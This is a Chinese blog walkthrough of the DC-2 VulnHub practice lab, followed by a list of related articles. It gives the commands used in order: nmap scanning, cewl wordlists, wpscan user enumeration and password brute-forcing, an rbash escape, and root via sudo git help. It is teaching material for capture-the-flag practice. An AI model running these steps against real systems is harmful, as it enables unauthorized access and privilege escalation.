DC-2靶场搭建及渗透

最新推荐文章于 2024-10-12 18:55:34 发布
最新推荐文章于 2024-10-12 18:55:34 发布
阅读量288 收藏 3
点赞数
文章标签: linux 安全 运维 系统安全 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55772865/article/details/131216867
版权

 

一,靶场搭建

DC-2靶场下载地址http://www.five86.com/downloads/DC-2.zip

搭建过程和DC-1一样,将kali跟DC-2放同一网段即可

kali和dc-1都是NAT模式

二,渗透测试

第一个flag

主机探活

nmap -sV 192.168.75.0/24

192.168.75.130最有可能是靶机

进一步扫描

nmap -A -p- -v 192.168.75.130

发现开放80端口和7744端口

依据官方文档提示访问80端口需要在/etc/hosts文件中添加解析

火狐浏览器中输入http://dc-2,访问成功

拿到第一个flag

第二个flag

翻译第一个flag提示cewl

cewl:Kali Linux字典生成工具Cewl

cewl dc-2 -w pass.txt

cat pass.txt

生成字典做什么?爆破 寻找爆破点

nikto -url http://dc-2 -c all

或者

dirb http://dc-2

扫描到一个http://dc-2/wp-admin/,访问一下出现登陆页面

尝试爆破

但是缺少用户名字典,用wpscan进行用户枚举,再配合密码字典会提高效率

得到以下三个用户名,写进一个用户名字典

wpscan --url http://dc-2 -e u

vim user.txt

字典都有了,接下来就是爆破

wpscan --url http://dc-2 -U user.txt -P pass.txt

得到两个用户名和对应的密码

http://dc-2/wp-admin/页面登录尝试

jerry账户中有flag,tom账户中没有

提示

第三个flag

ssh:7744端口还没有用到,用得到的账号密码连接7744端口

只有tom可以连接

看一看自己是谁,权限是怎样的,可以使用的命令

rbash是Restricted bash缩写,即受限制的bash。

管理员可通过指定普通用户的bash为rbash,以此来限制相关操作。

在rbash中,很多行为和命令都会被受到限制。

ls

less flag3.txt

vi flag3.txt

第四个flag

第三个flag提示我们我们使用su来切换到jerry来找到进一步的线索

rbash有限制就绕过rbash的限制

调用/bin/sh命令解释器

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a

$ /bin/bash

tom@DC-2:~$ export PATH=$PATH:/bin/

tom@DC-2:~$ export PATH=$PATH:/usr/bin

su jerry

find / -name flag4.txt

cat /home/jerry/flag4.txt

第五个flag

git很扎眼,虽然他让我滚出去!!!

输入sudo -l发现可以使用git命令,可以使用root权限,但不需要root密码

用git提权

用root权限调用命令git,进入help配置文件

sudo git help config

!/bin/bash

!/bin/sh

sudo git help add

!/bin/bash

!/bin/sh

whoami

passwd root #修改root密码

cat final-flag.txt

well done

222172
关注
DC2靶场 wordpress
m0_62438849的博客
03-03 1164
试着登录网站,但是没有看到登录框,所以要扫描一下整个网站目录,可以用dirb http://dc-2或者dirsearch -u(指定url)http://dc-2。然后就能访问网站了,看到flag1,常用的字典攻击可能会不奏效,需要用 字典生成工具cewl,密码总是越多越好,但无法获得所有密码,登录后可以看到下一个flag。可以知道登录入口是,http://dc-2/wp-admin/(wordpress的登录入口就是/wp-admin/)Cewl是一个 ruby 应用,爬行指定url的指定深度。
DC-1靶场搭建渗透
weixin_55772865的博客
06-13 736
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
DC系列】DC-2靶场
qq_51611948的博客
02-14 1500
详细介绍DC2靶机渗透全过程
DC-2靶场搭建渗透实战详细过程(DC靶场系列)
金 帛的博客
07-02 8523
DC-2靶场渗透实战过程
DC-2靶场
m0_74413354的博客
03-14 687
Vulhub下DC系列靶场DC2靶场通关
kali渗透DC-1靶场搭建渗透
What_ray的博客
02-29 1634
使用kali对DC-1进行渗透
DC-2靶场详细教程
2301_77518341的博客
09-27 2449
DC-2靶场实验报告一、环境搭建:1. 靶场描述靶场描述与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没
vulnhub靶场 DC-2靶机 渗透详细过程
黑战士的博客
02-21 1091
*4.rbash提权**
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1562
DC-2DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 2757
vulnhub的dc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
DC-2靶场记录
lionwerson的博客
11-17 1032
1.下载DC-2靶场: 下载地址https://download.vulnhub.com/dc/DC-2.zip2.虚拟机打开靶场改网卡模式为桥接模式,打开虚拟机。 如果要是直接访问靶机的IP的80端口是打不开的,会跳转到http://dc-2/,要修改hosts文件,然后就可以访问到了。 在hosts文件结尾添加: ip地址 dc-2 这是一个wordpress的cms,第一个flag提示我们进行登录并且用cewl生成密码列表。 cewl -w dc.txt http://d.
Vulnhub靶场----2DC-2
七天
02-21 619
Vulnhub-DC2
DC-2靶场-渗透测试
negnegil的博客
06-06 756
靶机:DC-2 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 下载后导入和kali相同的虚拟机平台即可 靶场的网络模式设置为桥接模式,启动 1.先以ARP扫描以下局域网内靶机的ip arp-scan -l netdiscover、nmap、msf、powershell等常用工具也可以进行主机扫描,感兴趣可自行摸索 2.使用nmap扫一下ip查看端口开放 nmap功能很强大,不仅能够扫描端口,嗅探所提供的网络服务、还能探测存货主机、简单漏洞扫描和绕过防火墙
DC系列靶机-DC2
慕舟舟的博客
10-12 1333
rbash逃逸的时候要根据具体的情况选择合适的方法;git提权;对市面上常见的cms,要选择合适的工具,可以达到事半功倍的效果;hosts文件,且它的解析优先级比DNS更高,可以将目标主机ip地址和域名写入hosts文件;使用nmap扫描的时候,有时候处于安全考虑,会修改ssh服务的端口;
DC-2 实验靶场步骤讲解
2401_84693907的博客
09-26 1186
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。输入wpscan --url http://dc-2 --enumerate u。
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 1922
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
靶场DC-2靶机详解
2401_84693966的博客
09-27 1525
与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。看到了,访问不到且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。
Vulnhub靶场-DC-2靶机练习
qq_44877412的博客
01-20 496
Vulnhub-DC-2 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-2 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一、信息收集 1、主机存活扫描 arp-scan -l 2、端口扫描 nmap -A -p- 192.168.143.135 发现开放的端口以及服务 80 wordpress 7744 ssh 3、脚本扫描 nmap --script
vulnhubcms靶场DC
最新发布
01-09
### VulnHub CMS DC 靶场环境搭建教程 #### 下载靶场 VulnHub 提供了一个名为 DC 的系列实验靶场,非常适合安全爱好者和渗透测试初学者进行学习和实践。这个平台允许用户下载多种虚拟机,这些虚拟机预装了各种漏洞,以便于在本地环境中进行渗透测试、提权、漏洞利用和代码审计等操作[^1]。 对于特定的 CMS DC 系列,可以访问 VulnHub 官方网站获取更多详情和下载链接。具体到 DC-1 这一入门级别的靶机,其官方描述表明这是一个特意建造的易受攻击的实验室,旨在帮助新手积累渗透测试的经验。目标是在该环境中取得 root 权限并找到五个 flag[^2]。 #### 环境准备 为了顺利开展实验,在下载完成后需确保拥有合适的虚拟化软件来运行所得到的 .ova 文件,比如 VirtualBox 或 VMware Player。安装完毕后按照提示导入 OVA 文件即可完成部署工作。 #### 开始探索 一旦启动 VM 并连接网络,可以通过 nmap 扫描确认开放的服务端口: ```bash nmap -A <target_ip> ``` 根据已知信息,DC-1 主要暴露了如下几个服务: - SSH (Port 22): 使用 OpenSSH 6.0p1 版本。 - Web Service (Port 80): 基于 Apache httpd 2.2.22 和 Drupal 7 构建。 - RPCBind (Port 111)[^4] 考虑到 Web 应用程序可能存在的风险点,建议使用 WPScan 对任何基于 WordPress 的组件进行全面审查;尽管此案例中的 CMS 是 Drupal 而不是 WordPress,但对于其他类型的 CMS 工具也有类似的专用扫描器可供选用[^3]。 通过上述步骤,便能建立起一个完整的 VulnHub CMS DC 实验室环境用于后续的学习与研究活动之中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值